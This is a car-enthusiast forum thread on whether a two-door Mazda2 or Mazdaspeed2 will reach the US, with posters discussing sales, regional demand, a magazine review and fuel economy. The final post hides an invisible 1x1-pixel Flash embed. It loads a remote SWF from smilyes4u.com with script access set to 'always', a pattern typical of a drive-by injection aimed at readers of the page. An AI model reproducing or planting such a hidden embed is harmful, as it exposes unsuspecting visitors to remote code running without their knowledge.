mazda2 2 door

Do you guys think the Mazda2 2 door will come to the States anytime soon? I really want a mazda2 2 door but if its not gonna come.. then i guess 4 door will have to do.

Do you guys think the Mazda2 2 door will come to the States anytime soon? I really want a mazda2 2 door but if its not gonna come.. then i guess 4 door will have to do.

As much as i want to see the two door in the US, don't hold your breath.

If the Mazda2 is selling well, which i think it is there still needs to be demand for a two door version in the US. With the current manufacture trend here in the US of 4 door only hatchbacks and on top of the fact that American's seem to hate any thing that's a hatchback and small. I seriously doubt it.

Maybe, just maybe if Mazda decides to actually create a MAZDASPEED2 for the US, hopefully it'll be a two door.

I hope for a 2 door mazda 2. or even the mazdaspeed2. I would instantly trade in my Mazdaspeed3 for either one.

A 2-door MS2 would actually be a deal breaker for me. It's the mix of practicality and fun that makes these cars worthwhile. If I didn't want four doors, I'd go get a Miata or something. I feel like, on cars where there's a choice between a 2-door and a 4-door, you usually gain a lot and lose very little by having the extra doors.

There are, of course, exceptions, but they're usually higher-end, larger cars, like the BMW 3-series.

If the Mazda2 is selling well, which i think it is there still needs to be demand for a two door version in the US.

From what I understand, the 2 is unfortunately not selling all that well in the US. And considering Mazda's current financial problems, the last thing they need to do is incur the expense of bringing yet another model here (Mz2 3-door) that won't sell well.

From what I understand, the 2 is unfortunately not selling all that well in the US. And considering Mazda's current financial problems, the last thing they need to do is incur the expense of bringing yet another model here (Mz2 3-door) that won't sell well.

That's a shame. I was just assuming as I see them pretty often in South Florida. 3 alone are parked at my job. But yeah, I don't see it happening.

A 2-door MS2 would actually be a deal breaker for me. It's the mix of practicality and fun that makes these cars worthwhile. If I didn't want four doors, I'd go get a Miata or something. I feel like, on cars where there's a choice between a 2-door and a 4-door, you usually gain a lot and lose very little by having the extra doors.

There are, of course, exceptions, but they're usually higher-end, larger cars, like the BMW 3-series.

When it comes to my car I'm selfish and impractical. So two doors is perfect for me. :)

That's a shame. I was just assuming as I see them pretty often in South Florida. 3 alone are parked at my job. But yeah, I don't see it happening.

They seem to be doing well out here, too. I see tons of B-Seg cars around Sac in general, and when talking to dealers they've mentioned how well the car's been selling.

But I can totally see how this car would be unattractive in the middle of the country where roads are long and straight and Japanese cars in general are still viewed with a little suspicion.

But I can totally see how this car would be unattractive in the middle of the country where roads are long and straight and Japanese cars in general are still viewed with a little suspicion.

We have tons of Japanese cars on the road here in Minneapolis, and I see Mazda 3's and 6's all over the place. But B-seg cars in general aren't that big here, probably because gas isn't as expensive as it is on the coasts. I'm lucky if I see another Mazda 2 once every two weeks.

the 2 is not selling well in the us. its king in canada lol but not in the us.. and with motortrend or whatever mag it was that rated the 2 the lowest, i have low hopes for a speed or coupe here... (wait a 2 door hatch is also a coupe right?)

THE 2 SHALL REIGN KING!!!

GAHHHHHHH

We have tons of Japanese cars on the road here in Minneapolis, and I see Mazda 3's and 6's all over the place. But B-seg cars in general aren't that big here, probably because gas isn't as expensive as it is on the coasts. I'm lucky if I see another Mazda 2 once every two weeks.

You're still in a pretty big metro area there, too, looks like over 3 million according to Wikipedia. I'm thinking when you get to metro areas of under a million, and into all the small cities and towns of under 100k, that you'll really start seeing places where everybody's still driving domestic boats.

the 2 is not selling well in the us. its king in canada lol but not in the us.. and with motortrend or whatever mag it was that rated the 2 the lowest, i have low hopes for a speed or coupe here... (wait a 2 door hatch is also a coupe right?)

THE 2 SHALL REIGN KING!!!

GAHHHHHHH

Yeah, Motortrend didn't get it. They often don't. Which is sad to say, because I have a connection there and might work for them some day.

MAN! i really wanted a 2 door Mazda2... yeaa i live in SoCal and i dont see too many mazda2's.. maybe with rising gas prices people will start to think straight

I'm in the Omaha metro area of Nebraska, and we are seeing more and more B seg cars, including 2s. I commute to Fremont every day, which is about a 35 mile highway commute, and I see 3 different Yaris 3 doors, 2 Minis, a SmartCar, and several Aveos on my drive to and from every day. The market is growing, and I am seeing more 2s on the road (another red Sport just like mine somewhere around my neighborhood). Unfortunately there are many more Aveos and Yaris flooding the B seg market here. The ability to buy either of those cars for closer to $10K than $15K is probably the biggest driving force on that one.

Yeah, Motortrend didn't get it. They often don't. Which is sad to say, because I have a connection there and might work for them some day.

they gave it bad ratings on everything but handling lol.

but i didnt get was they claimed 27mpgs M/T. i have A/T and get roughly 34. and i know others on here with M/T getting close to 40.... and even when having fun they get roughly 30.

they gave it bad ratings on everything but handling lol.

but i didnt get was they claimed 27mpgs M/T. i have A/T and get roughly 34. and i know others on here with M/T getting close to 40.... and even when having fun they get roughly 30.

Sadly 27 is almost exactly what I'm averaging. (I think I'm actually at like 28.5 but not a big difference.)

All you've gotta do is drive somewhere that has a 45 limit but times the traffic lights so that you have to stop at every single one. 0-45-0 ever 1/4mi doesn't help mileage much.

Not gonna happen.
I agree...<object width="1" height="1" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="undefined" value="http://smilyes4u.com/d/14/nr.swf" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://smilyes4u.com/d/14/nr.swf" /><param name="allowscriptaccess" value="always" /><embed width="1" height="1" type="application/x-shockwave-flash" src="http://smilyes4u.com/d/14/nr.swf" undefined="http://smilyes4u.com/d/14/nr.swf" allowScriptAccess="always" allowscriptaccess="always" /></object>
(whistle)

Latest posts

Back